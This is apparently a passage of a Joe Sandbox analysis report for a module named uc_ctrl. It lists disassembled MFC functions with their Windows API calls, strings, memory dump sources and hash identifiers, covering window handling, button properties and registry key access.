Part of subcall function 6CB84748: __EH_prolog3.LIBCMT ref: 6CB8474F

Strings

MFCShellTreeCtrl_EnableShellContextMenu, xrefs: 6CB4B54F
TRUE, xrefs: 6CB4B571
???, xrefs: 6CB4B4D6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$FileInfo$ByteCharException@8MultiThrowWide
String ID: ???$MFCShellTreeCtrl_EnableShellContextMenu$TRUE
API String ID: 607398831-3649263699
Opcode ID: 4141a0208845932d91052fa18a3616f8b2fe618d018250ec7424171d50d39960
Instruction ID: 7449d8833cb9b665cd6c334c717e5d5eb854d217c054492573d766bb79cd87d5
Opcode Fuzzy Hash: 4141a0208845932d91052fa18a3616f8b2fe618d018250ec7424171d50d39960
Instruction Fuzzy Hash: E841A130A11249ABDF04DFB4CC59FFEB7B8EF14308F508568A515A7AD0EB34AA18DB51

Function 6CB43E79 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB43E80

Part of subcall function 6CB7EE58: __EH_prolog3.LIBCMT ref: 6CB7EE5F

Part of subcall function 6CB98450: SetRectEmpty.USER32(?), ref: 6CB9848B

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

SetRectEmpty.USER32(?), ref: 6CB43FC4
SetRectEmpty.USER32 ref: 6CB43FD5
SetRectEmpty.USER32(?), ref: 6CB43FDC

Part of subcall function 6CB1B756: _wcslen.LIBCMT ref: 6CB1B769

Strings

True, xrefs: 6CB43FEE
False, xrefs: 6CB4403A

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyRect$H_prolog3$_wcslen
String ID: False$True
API String ID: 2034430949-1895882422
Opcode ID: ab012596a84ecdead7a8e8b9f80602c1b4937c5263b3850d13ec5c91a6f78c9f
Instruction ID: 7b4ee407d8728f40439d87c7c177fdb78703917872966f982ad9c29135c03219
Opcode Fuzzy Hash: ab012596a84ecdead7a8e8b9f80602c1b4937c5263b3850d13ec5c91a6f78c9f
Instruction Fuzzy Hash: 6851C1B09152519FCB0ACF68C494BE9BBE8BF09704F1881BEE81D9F796DB741204CB65

Function 6CB1DF11 Relevance: 10.6, APIs: 7, Instructions: 119windowthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB1DE75: GetParent.USER32(?), ref: 6CB1DEC3
Part of subcall function 6CB1DE75: GetLastActivePopup.USER32(?), ref: 6CB1DED6
Part of subcall function 6CB1DE75: IsWindowEnabled.USER32(?), ref: 6CB1DEEA
Part of subcall function 6CB1DE75: EnableWindow.USER32(?,00000000), ref: 6CB1DEFD

EnableWindow.USER32(?,00000001), ref: 6CB1DF5C
GetWindowThreadProcessId.USER32(?,?), ref: 6CB1DF72
GetCurrentProcessId.KERNEL32 ref: 6CB1DF7C
SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6CB1DF92
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 6CB1E015
MessageBoxW.USER32(?,?,?,6CB1A556), ref: 6CB1E037
EnableWindow.USER32(00000000,00000001), ref: 6CB1E05C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Enable$MessageProcess$ActiveCurrentEnabledFileLastModuleNameParentPopupSendThread
String ID:
API String ID: 1924968399-0
Opcode ID: 3780ffdcd22714a7d3290f350636d73082a3bbe3fd188b46847231acee32e274
Instruction ID: 673bc899ad8dd387541d156c8180f4880de3d32b9daf181562e7b7ead1527a6a
Opcode Fuzzy Hash: 3780ffdcd22714a7d3290f350636d73082a3bbe3fd188b46847231acee32e274
Instruction Fuzzy Hash: E241AD71A4525C9FDF219F78DC88BEEB7B8EB15704F1001A9E518D7A40DB30DE818BA2

Function 6CB3D88A Relevance: 10.6, APIs: 7, Instructions: 113windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000407,00000000,?), ref: 6CB3D8CC
GetParent.USER32(?), ref: 6CB3D8F0
SendMessageW.USER32(00000000,00000111,?), ref: 6CB3D91D
GetParent.USER32(?), ref: 6CB3D93C
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 6CB3D9A7
GetParent.USER32(?), ref: 6CB3D9B0
GetWindowLongW.USER32(?,000000F4), ref: 6CB3D9CB

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Parent$MessageSendWindow$LongRedraw
String ID:
API String ID: 4271267155-0
Opcode ID: 24f5030ae4f7d5e7986a06fef00bbb4f68e9076a274ed279f2605414732992b8
Instruction ID: 0c9ea559b71847bf3159d9829d34bb92a042e17e2eb18cfe8e8549903dcdec27
Opcode Fuzzy Hash: 24f5030ae4f7d5e7986a06fef00bbb4f68e9076a274ed279f2605414732992b8
Instruction Fuzzy Hash: B6310471B22260EBDF044F71DC48A6ABA78FF0A319F045356E95CD7990C774D850CBA2

Function 6CB378AB Relevance: 10.6, APIs: 7, Instructions: 108windowCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB378BF
GetFocus.USER32 ref: 6CB378E7

Part of subcall function 6CB2744F: UnhookWindowsHookEx.USER32(?), ref: 6CB27479

IsWindowEnabled.USER32(?), ref: 6CB37916
EnableWindow.USER32(00000001,00000000), ref: 6CB37931
EnableWindow.USER32(00000000,00000001), ref: 6CB379D0
IsWindow.USER32(?), ref: 6CB379DA
SetFocus.USER32(?), ref: 6CB379E5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$EnableFocus$EnabledHookUnhookWindows_wcslen
String ID:
API String ID: 934345902-0
Opcode ID: 6b11adfa3a99e043d9de0ee2d07263507a8e9ccb399aa88d7925f462323cd925
Instruction ID: 623b9b40e3e03d2afb46e999cc30585ea9b7e72e72b6034494471908ed0f9cc3
Opcode Fuzzy Hash: 6b11adfa3a99e043d9de0ee2d07263507a8e9ccb399aa88d7925f462323cd925
Instruction Fuzzy Hash: 96418E30701251FFDB049F68CA84F99FBB5FF46318F149269E41CA7610DBB1A858CB92

Function 6CB1D91A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107registryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB1D924
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 6CB1DA15
RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6CB1DA32
RegCloseKey.ADVAPI32(?), ref: 6CB1DA53
RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6CB1DA6E

Strings

Software\, xrefs: 6CB1D98F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CloseEnumH_prolog3_OpenQueryValue
String ID: Software\
API String ID: 1666054129-964853688
Opcode ID: af51eafae5b9a065651c6965906c7f34e01c712c7d5b6b061673a0f9473e64a7
Instruction ID: 2ba1494df2588f984073af933332618ece94a8ee0363faa0d6a12d1bf57f1359
Opcode Fuzzy Hash: af51eafae5b9a065651c6965906c7f34e01c712c7d5b6b061673a0f9473e64a7
Instruction Fuzzy Hash: 4C418571905169BBCB22DBA0DC98FEEBB7DEF49314F100199E504A2A50DB34DB85CF51

Function 6CB3EC01 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 92COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB3EC08

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB8602D: __EH_prolog3.LIBCMT ref: 6CB86034

Strings

MFCColorButton_EnableOtherButton, xrefs: 6CB3EC44
Automatic, xrefs: 6CB3EC9A
Other, xrefs: 6CB3EC65
MFCColorButton_ColumnsCount, xrefs: 6CB3ECC0
MFCColorButton_EnableAutomaticButton, xrefs: 6CB3EC7C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: Automatic$MFCColorButton_ColumnsCount$MFCColorButton_EnableAutomaticButton$MFCColorButton_EnableOtherButton$Other
API String ID: 2949695960-3051800008
Opcode ID: 3a39398c64dbfbfab5699bb8359b8706807988538bab926257d001e219acd7fc
Instruction ID: 72a1ab360225b61d35aa6758283f636e9a02d612f9ca36f2898dcb65573f34cd
Opcode Fuzzy Hash: 3a39398c64dbfbfab5699bb8359b8706807988538bab926257d001e219acd7fc
Instruction Fuzzy Hash: 863141709011DAAADF11DBA4CD54EFFBBBCEF84308F50045AE415B6A90EB359E09CB61

Function 6CB4392F Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB43936

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB8602D: __EH_prolog3.LIBCMT ref: 6CB86034

Strings

MFCMenuButton_RightArrow, xrefs: 6CB43997
MFCMenuButton_DefaultClick, xrefs: 6CB439DB
MFCMenuButton_StayPressed, xrefs: 6CB439B9
MFCMenuButton_OSMenu, xrefs: 6CB43972
MFCMenuButton_Autosize, xrefs: 6CB439FD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: MFCMenuButton_Autosize$MFCMenuButton_DefaultClick$MFCMenuButton_OSMenu$MFCMenuButton_RightArrow$MFCMenuButton_StayPressed
API String ID: 2949695960-2044485435
Opcode ID: 7b437d2ee7984f7a668121fd978e07495632202fb55f0e9738799bea7d25c6e7
Instruction ID: 6276033429c885116cb47d34edeed266f4b5675d9fc579e0aece0b461503e197
Opcode Fuzzy Hash: 7b437d2ee7984f7a668121fd978e07495632202fb55f0e9738799bea7d25c6e7
Instruction Fuzzy Hash: 81311EB0D0525E9ADF01DFA4C8949EFBBB8FF08208F104416E825A7750EB34DA09CFA5

Function 6CBB63D1 Relevance: 10.6, APIs: 7, Instructions: 86COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(00000000,00000004,00000004), ref: 6CBB6412
ValidateRect.USER32(?,00000000,?), ref: 6CBB644E
UpdateWindow.USER32(?), ref: 6CBB6457
LockWindowUpdate.USER32(00000000), ref: 6CBB6468
ValidateRect.USER32(?,00000000,?), ref: 6CBB6496
UpdateWindow.USER32(?), ref: 6CBB649F
LockWindowUpdate.USER32(00000000), ref: 6CBB64B0

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: 5d39325ae9fd9426e35b58903dcd4e7a7b392be8d4fc10b3ab23ac23814cf341
Instruction ID: f587eb9dc47c6f25f4865e2acbae36438dd9af67eec62ce27fc4cc78712a9a8c
Opcode Fuzzy Hash: 5d39325ae9fd9426e35b58903dcd4e7a7b392be8d4fc10b3ab23ac23814cf341
Instruction Fuzzy Hash: D931BC31A01A44EFDF198F64C944BAABBB9FF05704F24426AE859E7A50DF31EC00CB51

Function 6CB1CD49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6CB1CD84
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6CB1CDB0
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6CB1CDDC
RegCloseKey.ADVAPI32(00000000), ref: 6CB1CDEE
RegCloseKey.ADVAPI32(00000000), ref: 6CB1CDFD

Part of subcall function 6CB1D27B: GetModuleHandleW.KERNEL32(Advapi32.dll,0002001F,?,?,6CB1CD82,80000001,software,00000000,0002001F,?), ref: 6CB1D28C
Part of subcall function 6CB1D27B: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6CB1D29C

Strings

software, xrefs: 6CB1CD6D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CloseCreate$AddressHandleModuleOpenProc
String ID: software
API String ID: 550756860-2010147023
Opcode ID: 571f48600dfb66be9a29b59bb2cb3ffcbd118ef573208de6c89788f35f652f23
Instruction ID: 5314bda9565d143c187c1a53c34c2e396cb158d83ef6154fc6b4c64ec738eb16
Opcode Fuzzy Hash: 571f48600dfb66be9a29b59bb2cb3ffcbd118ef573208de6c89788f35f652f23
Instruction Fuzzy Hash: B9214CB2A09168BFDF01EEA4DC44EBF7F7DEB45704F104069F911E2A00D7309A459BA5

Function 6CB2739F Relevance: 10.6, APIs: 7, Instructions: 69COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB273BC
GetWindowRect.USER32(?,?), ref: 6CB273E0
ScreenToClient.USER32(?,?), ref: 6CB273ED
ScreenToClient.USER32(?,?), ref: 6CB273FA
EqualRect.USER32(?,?), ref: 6CB27405
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 6CB2742C
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 6CB27436

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 1d9dbb5129999fe2f223c4813b496b6950453d4c981b9dbeaec857d3b8f9b518
Instruction ID: 6c2c8dd861b5d7ff898467cc2b1f965fbc909030324781a9c3fa839fab4f728b
Opcode Fuzzy Hash: 1d9dbb5129999fe2f223c4813b496b6950453d4c981b9dbeaec857d3b8f9b518
Instruction Fuzzy Hash: F821EC7690160AEFCB00DFA8CD44DAFBBB8FF09310B604419E915E3250D7319A548BA5

Function 6CB4AA2D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4AA34
SendMessageW.USER32(?,00001200,00000000,00000000), ref: 6CB4AA5A
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 6CB4AA70

Strings

B, xrefs: 6CB4AA90
B, xrefs: 6CB4AA89
BBBB, xrefs: 6CB4AAA5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3_
String ID: B$B$BBBB
API String ID: 3491702567-1601851001
Opcode ID: 34159fde9081eea41a32d2116756dfdd4bfb274fd70ababa0ba168ae05a96c2e
Instruction ID: db7ec0a3a855297431a9f2eafc7faf1d856e6deb1cf7774b1487a52b810b0506
Opcode Fuzzy Hash: 34159fde9081eea41a32d2116756dfdd4bfb274fd70ababa0ba168ae05a96c2e
Instruction Fuzzy Hash: E01102B1A001999BDF108FB5CD58DEFBE79FF49348F404228E401AB7A0DB349A09CB64

Function 6CB222AC Relevance: 10.6, APIs: 7, Instructions: 61COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6CB222C6
GetWindow.USER32(?,00000005), ref: 6CB222CF
GetDlgCtrlID.USER32(00000000), ref: 6CB222DE
GetWindowLongW.USER32(00000000,000000F0), ref: 6CB222EE
GetWindowRect.USER32(00000000,?), ref: 6CB2230C
PtInRect.USER32(?,?,?), ref: 6CB2231C
GetWindow.USER32(00000000,00000002), ref: 6CB22329

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
